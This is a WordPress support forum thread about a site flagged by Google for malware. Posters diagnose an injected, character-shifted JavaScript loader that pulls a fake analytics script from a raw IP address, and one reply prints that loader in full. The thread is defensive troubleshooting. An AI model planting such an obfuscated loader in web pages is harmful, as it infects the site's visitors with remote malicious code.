Support » Fixing WordPress » Warning Visiting this site may harm your computer! Help!

  • Hello,

    Yesterday my site started spitting out the dreaded ‘Visiting this site may harm your computer’ so I did a search through all the files for the javascript mentioned in a previous thread. I then found on the diagnostic page a reference to:
    ‘2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including feed2js.org/, feeds.feedburner.com/~s/.’

    Which are components of two different legitimate scripts that I have running for feedburner obviously. The weird thing is, I’ve had these running for a few months and never had any problems. So I just removed them and then requested google to review my site after I’ve removed the problem. Is this all I need to do and just wait for google to get around to reviewing my site? If so, doesn’t this seem odd that google polices the internet? Anyone know how long it might take google to take down this message?

    Site I’m referencing is http://www.vintageglamblog.com

    Any help is appreciated!

    Matt

Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter mnistor1

    (@mnistor1)

    For anyone who’s had a similar problem, I’ve just found some code that could be the culprit.

    I have this snippet in the HTML tag when the page is rendered:

    <script>var source =”=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?”; var result = “”;for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script>

    In the source, before the page is rendered, this takes the shape of some sort of wordpress language preference tag that doesn’t look suspicious in itself. I’m in the process of removing this now and hopefully that should do it.

    I have noticed this same script inserted March 23rd ~7:20 AM on number of pages on a site I’ve begun to maintain as well. Here are my observations:

    1. This script seems to have been inserted on insecure IIS servers (no Apache specific attacks noted yet)
    2. This script appends itself to the tail end (after the closing </HTML> tag) of index pages only – on the site I maintain, ALL the “index.htm” files in every directory spceifically
    3. This attack also targets the “_vti_cnf/index.htm” ASP settings as well
    4. pages not named “index.htm” do not seem to be affected

    When I noticed the code on Saturday the 28th using Internet Explorer, it attempted to download a PDF file on my system from an unknown URL that I killed (the acrobat process) with task manager before it fully loaded. I should also note that FireFox (3.0.7) was unaffected by the script and I only noticed the problem when checking some HTML changes I made using IE 8.

    Hope this info helps someone else.

    csrollyson

    (@csrollyson)

    I just went through this and documented the tools and process I used to make it right. Hope this helps you!

    http://globalhumancapital.org/?p=819

    cheers- Chris

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Warning Visiting this site may harm your computer! Help!’ is closed to new replies.